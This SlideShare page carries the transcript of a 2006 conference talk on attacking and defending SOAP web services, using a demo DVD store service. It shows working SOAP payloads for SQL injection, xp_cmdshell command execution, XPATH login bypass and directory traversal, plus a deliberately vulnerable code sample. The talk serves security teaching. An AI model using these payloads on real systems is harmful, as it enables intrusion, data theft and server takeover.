• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content

Loading…

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

Like this presentation? Why not share!

Advanced Web Services Hacking (AusCERT 06)

on

  • 28,016 views

Advanced Web Services Hacking - Attacks & Defense (AusCERT 2006). ...

Advanced Web Services Hacking - Attacks & Defense (AusCERT 2006).

Web services attacks are on the rise with evolution of web applications which are consuming back end web services over SOAP. UDDI, SOAP and WSDL are three important blocks of this new attack vectors. Several attacks are evolving around web services like UDDI enumeration, XPATH injection, XML poisoning, WSDL scanning, SOAP bruteforcing etc. At the same time new range of defense is evolving for web services with SOAP filtering. It is critical to know methodologies, attack vectors and defense strategies before deploying web services into the corporate environment. This paper will discuss advanced web services hacking methods and defense approaches.

Statistics

Views

Total Views
28,016
Views on SlideShare
23,749
Embed Views
4,267

Actions

Likes
44
Downloads
0
Comments
14

17 Embeds 4,267

http://mauriziostorani.wordpress.com 2726
http://www.arcanesecurity.net 1321
http://www.slideshare.net 82
http://daniel-wedepohl.de 35
http://www.secguru.com 32
http://www.blueinfy.com 22
http://translate.googleusercontent.com 13
http://arcanesecurity.net 12
http://www.techgig.com 8
http://web.archive.org 5
http://blueinfy.com 3
http://www.linkedin.com 3
http://localhost:8080 1
http://health.medicbd.com 1
https://s3.amazonaws.com 1
http://webcache.googleusercontent.com 1
http://www.admiration.se 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

110 of 14 previous next Post a comment

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…

110 of 14 previous next

Post Comment
Edit your comment

    Advanced Web Services Hacking (AusCERT 06) Advanced Web Services Hacking (AusCERT 06) Presentation Transcript

    • Advanced Web Services Hacking Attacks & Defense Shreeraj Shah
    • Introduction Founder & Director G Net Square (Brief) – Past experience G Chase, IBM & Foundstone – Interest G Web security research – Published G Advisories, Tools, Papers etc. – Book G Web Hacking – http://shreeraj.blogspot.com shreeraj@net-square.com Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Industry Web 2.0 Applications are on the rise G Rich Internet Applications (RIA) – G reshaping application front Web Services on the rise – forming G backend of applications Gartner is advising companies to take up G Web services now, or risk losing out to competitors embracing the technology. Shreeraj Shah
    • Industry By 2008, those without Web Services or G Service-Oriented Architecture (SOA) would find their competitors had left them in the dust. [Gartner] 2006-07 would see the top 2000 global G companies pick up the technology and make it mainstream. Government and SMB would finally follow in 2008. Web services would rocket from $1.6 G billion in 2004 to $34 billion by 2007. [IDC] Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Technologies Web Services is forming back end and G accessible on SOAP AJAX – empowering browsers G XML based services G Rich Internet Applications are consuming G back end web services Search engines and mechanisms for web G services publishing and accessing Security evolving around web services G Shreeraj Shah
    • Technologies Internet DMZ Trusted SOAP Web Service W Client E Application Scripted B Web Servers Web S Server And Engine E Static pages Dynamic pages Web Integrated R HTML,HTM etc.. ASP DHTML, V Client Framework PHP,CGI Etc.. I ASP.NET with C X .Net E J2EE App S Server Web Services Etc.. DB Shreeraj Shah Internal/Corporate
    • Technologies Simple GET/POST Simple AJAX HTTP resource Web Calls Web Services Server resource Web Services Client Shreeraj Shah
    • Web services stack Presentation Stack XML Security Stack WS-Security Discovery Stack UDDI, DISCO Access Stack WSDL,SOAP Transport Stack HTTP, HTTPS Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Security! Web service - evolving as new attack G point in application framework. Toolkits and Exploits are coming up G Too many protocols and confusion G Race for deployment – poor G implementation Cases and attacks are growing with G growth in business usage Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies Tools & & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Assessment strategies Web Services Risk Model Blackbox Whitebox Assessment Assessment Web Services Defense Controls Shreeraj Shah
    • Risk - In transit In transit Sniffing or Spoofing G WS-Routing security concern G Replay attacks G Shreeraj Shah
    • Risk - Web services Engine Buffer overflow G XML parsing attacks G Spoiling Schema G Complex or Recursive structure as payload G Denial of services G Large payload G Shreeraj Shah
    • Web services Deployment - Risk Fault code leaks G Permissions & Access issues G Poor policies G Customized error leakage G Authentication and Certification G Shreeraj Shah
    • Web services User code - Risk Parameter tampering G WSDL probing G SQL/LDAP/XPATH/OS command injection G Virus/Spyware/Malware injection G Bruteforce G Data type mismatch G Content spoofing G Session tampering G Format string G Information leakage G Authorization G Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • wschess (Tool) wsPawn wsFootprint Footprinting wsSearch wsDiscovery Discovery Public domain search wsEnum wsKnight Enumeration wsAudit wsProxy Manual Audit Auto Audit wsMod wsRook Defense Download : http://net-square.com/wschess/ Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods •Footprinting •Discovery Defense Controls •Public Domain Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Web Services Footprinting Shreeraj Shah
    • Footprinting Objectives G Place for web services… – We may know the company name in this – case? Do we have any whois for web services? – If we answer above questions then we can – have enough information on what to assess? Shreeraj Shah
    • UDDI Universal Description, Discovery, and G Integration (UDDI) It acts as White/Yellow/Green pages G Xmethods etc… G Information can be published and retrieved G from Gets replicated across networks over G internet Shreeraj Shah
    • UDDI It includes G businessEntity – businessService – bindingTemplate – tModel – Shreeraj Shah
    • Footprinting Business Name POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 229 <?xml version="1.0" encoding="UTF-8" ?> <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"> <Body> <find_business generic="2.0" maxRows="100" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_business> </Body> </Envelope>HTTP/1.1 100 Continue Shreeraj Shah
    • Footprinting Business Name HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 09:53:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 1339 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><businessList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi- org:api_v2"><businessInfos><businessInfo businessKey="bfb9dc23-adec-4f73-bd5f- 5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services for Testing</name><description xml:lang="ko">Amazon Web Services 2.0 - We now offer software developers the opportunity to integrate Amazon.com</description><serviceInfos><serviceInfo serviceKey="41213238-1b33-40f4-8756- c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo></serviceInfos></businessInfo><businessInfo businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5"><name xml:lang="en">Amazon.com</name><description xml:lang="en">E-commerce website and platform for finding, discovering, and buying products online.</description><serviceInfos><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877- ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo></serviceInfos></businessInfo></businessInfos></businessList></soap:Bod Shreeraj Shah y></soap:Envelope>
    • Footprinting Services POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 213 <?xml version="1.0" encoding="UTF-8" ?> <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"> <Body> <find_service generic="2.0" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_service> </Body> </Envelope> HTTP/1.1 100 Continue Shreeraj Shah
    • Footprinting Services HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 10:07:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 1272 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos><serviceInfo serviceKey="6ec464e0-2f8d-4daf-b4dd-5dd4ba9dc8f3" businessKey="914374fb-f10f-4634-b8ef- c9e34e8a0ee5"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo><serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f- 5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877- ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo><serviceInfo serviceKey="bc82a008-5e4e-4c0c-8dba-c5e4e268fe12" businessKey="18785586-295e-448a-b759- ebb44a049f21"><name xml:lang="en">AmazonBookPrice</name></serviceInfo><serviceInfo serviceKey="8faa80ea-42dd-4c0d-8070-999ce0455930" businessKey="ee41518b-bf99-4a66-9e9e- c33c4c43db5a"><name xml:lang="en">AmazonBookPrice</name></serviceInfo></serviceInfos></serviceList></soap:Body></soap: Envelope> Shreeraj Shah
    • Footprinting t-Models POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 211 <?xml version="1.0" encoding="UTF-8" ?><Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"><Body><find_tModel generic="2.0" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_tModel></Body></Envelope> HTTP/1.1 100 Continue Shreeraj Shah
    • Footprinting t-Models HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 10:12:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 516 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><tModelList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi- org:api_v2"><tModelInfos><tModelInfo tModelKey="uuid:c5da9443-d058-4ede-9db1- 4f1d5deb805c"><name>Amazon Web Services 2.0 WSDL File</name></tModelInfo></tModelInfos></tModelList></soap:Body></soap:Envelope> DEMO Shreeraj Shah
    • Web Services Discovery Shreeraj Shah
    • Web Service Discovery After footprinting web services next step is G to perform discovery. On the basis of services found one can do G so. Finding access point for web services will G point to its discovery. Discovery is the key to the kingdom. G Once again over UDDI. G Shreeraj Shah
    • Web Service Discovery From various keys – Service and Business G one can dig access point from UBN. This is a part of protocol and identified from G XML block itself. DEMO Shreeraj Shah
    • Web Service Search Search in public domain G Use – Search Engines G Google & MSN – An excellent tool G Look for wsdl,asmx,jws etc. G Filetype and allinurl are best friends G Leveraging Web APIs G DEMO Shreeraj Shah
    • Web Services Enumeration & Profiling Shreeraj Shah
    • Technology Identification Running on which platform? G Configuration and Structures G File extensions G Path discovery G This is very useful information G Shreeraj Shah
    • Demo Application Web Services Location of WSDL Shreeraj Shah
    • Technology Identification Location can be obtained from UDDI as well G if already published. G WSDL location [ Access Point ] http://192.168.11.2/ws/dvds4less.asmx?wsdl .asmx – indicates .Net server from MS Shreeraj Shah
    • Technology Identification Similarly .jws – for Java web services G /ws/ - in the path indicates web services G MS-SOAPToolkit can be identified as well G C:>nc 192.168.11.2 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:48:20 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 7565 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/ Cache-control: private Shreeraj Shah
    • Technology Identification Resource header spits some information as G well C:>nc 192.168.11.2 80 HEAD /ws/dvds4less.asmx HTTP/1.0 HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:50:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 3026 Shreeraj Shah
    • WSDL Scanning/Enumeration What is WSDL? G What information one can G enumerate from WSDL? WSDL exposure is threat or not? G Shreeraj Shah
    • WSDL WSDL is web services definition G language It is similar to old IDL for remote G calls used in CORBA or other remote invoke methods. It contains detail of methods G Types of I/O G Parameters of methods G It is XML document with standards. G Shreeraj Shah
    • Nodes of WSDL Data types Message Operations Types Service Access Binding Shreeraj Shah
    • WSDL <Service> <service name="dvds4less"> <port name="dvds4lessSoap" binding="s0:dvds4lessSoap"> <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/> </port> </service> Where the call is going to hit? It is where service is listening. Shreeraj Shah
    • WSDL <portType> Methods one Can call <portType name="dvds4lessSoap"> <operation name="Intro"> <input message="s0:IntroSoapIn"/> <output message="s0:IntroSoapOut"/> </operation> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> <operation name="getRebatesInfo"> <input message="s0:getRebatesInfoSoapIn"/> <output message="s0:getRebatesInfoSoapOut"/> </operation> </portType> Shreeraj Shah
    • WSDL <Message> <portType name="dvds4lessSoap"> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> </portType> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message> Shreeraj Shah
    • WSDL <Types> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message> <s:element name="getProductInfo"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/> </s:sequence> </s:complexType> </s:element> <s:element name="getProductInfoResponse"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/> Shreeraj Shah
    • WSDL Profile after Scan Methods INPUT OUTPUT Intro -No- String getProductInfo String String getRebatesInfo String String DEMO Shreeraj Shah
    • How it looks? Intro WSDL <PortType> Web Services Remote getProductInfo <Service> Code Invokes <Message> <Types> OR getRebatesInfo Class Shreeraj Shah
    • Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
    • Web Services Attack Vectors Shreeraj Shah
    • AV 1 - XML poisoning XML node manipulation G Attack on parsing logic G SAX – DOM – Can be lethal – DoS or breaking G execution logic Shreeraj Shah
    • XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord> Shreeraj Shah
    • XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName><CustomerNumb er>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord> Shreeraj Shah
    • XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <FirstName>John</FirstName> ... 100 time… <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street<Address> <Email>john@smith.com<Email> <PhoneNumber>3809922347<PhoneNumber> </ CustomerRecord> Shreeraj Shah
    • AV 2 - Parameter tampering & Fault code leakage Fault code of web services spit lot of G information about internal workings. This attack can fetch internal paths, G database interfaces etc. Fault code is part of SOAP envelope and this G helps an attacker to make logical deduction about assets. DEMO Shreeraj Shah
    • SOAP request SOAP Forcing Fault Code Envelope Source of Enumeration <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Demo Call Shreeraj Shah
    • SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:inetpubwwwroot ebatesabx.xyz&amp;quot;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Fault Code Path Enumeration Shreeraj Shah
    • AV 3 - SQL injection SQL injection can be done using SOAP G traffic. It is innovative way of identifying database G interface points. One can leverage xp_cmdshell via SOAP. G Back end database can be compromised G using this attack. DEMO Shreeraj Shah
    • SOAP request SOAP Envelope <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> Input to the method Method Call Shreeraj Shah
    • SOAP request Product Information <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Shreeraj Shah
    • SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names. Use a single space if necessary.</faultstring> <detail /> </soap:Fault> </soap:Body> Fault Code Demo Indicates SQL Server Place for SQL Injection Shreeraj Shah
    • SOAP response Popular SQL Injection <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1 or 1=1</id> </getProductInfo> </soap:Body> </soap:Envelope> Fault Code Shreeraj Shah
    • SOAP request Works!! <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ Entire Table /(7)Lawrence of Arabia($14.99)/ Is out </getProductInfoResult> </getProductInfoResponse> </soap:Body> Shreeraj Shah
    • SOAP response Exploiting this Vulnerability <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1;EXEC master..xp_cmdshell 'dir c: > c:inetpubwwwrootwsdir.txt'</id> </getProductInfo> </soap:Body> </soap:Envelope> Exploit code Shreeraj Shah
    • SOAP request Works!! <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Looks Normal response Shreeraj Shah
    • SOAP request But … Code got executed Looks Normal Got Admin via response cmdshell Shreeraj Shah
    • AV 4 – XPATH injection XPATH is new way of querying XML G documents. This attack works nicely on web services G since they use XML extensively. Developer’s loophole can be leveraged with G an exploit. XPATH query crafting is next generation G attack methods. Shreeraj Shah
    • XPATH Injection - Basics XPATH is a language defined to find G information from XML document. As XPATH name suggests it indeed uses G path to traverse through nodes of XML document and look for specific information from the document. XPATH provides expressions like slash (/), G double slash (//), dot(.), double dot (..), @, =, <, > etc. It helps in traversing through XML document. Shreeraj Shah
    • XPATH – Vulnerable Code string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false Shreeraj Shah
    • Attacking XPATH point //users[@username='"+user+"' and @password='"+pass+"']"; G XPATH parsing can be leveraged by passing G following string ' or 1=1 or ''=‘ This will always true on the first node and G user can get access as who ever is first user. //users[@username='' or 1=1 or ''='' and @password='any'] G Bingo! DEMO Shreeraj Shah
    • AV 6 – LDAP injection LDAP authentication in place G Possible to manipulate LDAP queries G May leads to enumeration OR G manipulation Interesting attack vector G Fault code leaks LDAP interface G DEMO Shreeraj Shah
    • AV 7 – File System access Identifying file system points G Directory traversing & Access G Leads to file access and source code G exposure Lethal if found! G DEMO Shreeraj Shah
    • SOAP request SOAP Forcing Fault Code Envelope Source of Enumeration <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Demo Call Shreeraj Shah
    • SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:inetpubwwwroot ebatesabx.xyz&amp;quot;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Fault Code Path Enumeration Shreeraj Shah
    • SOAP request SOAP Forcing file Envelope <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>../rebates.asp</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Call Shreeraj Shah
    • SOAP request File Access to system Parameter Temparing <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfoResponse xmlns="http://tempuri.org/"> <getRebatesInfoResult>&lt;% ' file: rebates.asp ' date: 20- AUG-03 ' desc: rebates listing ' author: nd ' client: dvds4less 'check if we have been called with a filename or without loc = request.querystring("loc") lenloc = len(loc) if lenloc &gt; 0 then ' we have been called with a filename ' so print the rebate coupon%&gt;&lt;img ……………………. </getRebatesInfoResult> </getRebatesInfoResponse> </soap:Body> </soap:Envelope> Shreeraj Shah
    • AV 7 – SOAP brute forcing SOAP envelope takes user & pass accounts. G It is possible to bruteforce SOAP envelope G and look for specific responses. This is a possible attack which can get into G the system. Analyzing SOAP response is key for this set G of attack. DEMO Shreeraj Shah
    • AV 8 – Parameter overflow Adding large buffers to XML nodes G Depending on code controls – It may fail in G handling Breaking the application G May compromise as well G Traditional buffer overflow type attacks G DEMO Shreeraj Shah
    • AV 9 – Operating System access Point to OS G Remote command execution is possible G Either by “|” or “;” G Attack is very much possible G Leads to admin/root on the box… G DEMO Shreeraj Shah
    • AV 10 – Session hijacking Web services can maintain sessions G [WebMethod(EnableSession=true)] – Possible to reverse engineer session G Cookie tempering is reality… G Can be compared to traditional web G application session. DEMO Shreeraj Shah
    • Other attacks External referencing – XML schema G XSS attack G In transit attacks – replay and G spoofing Shreeraj Shah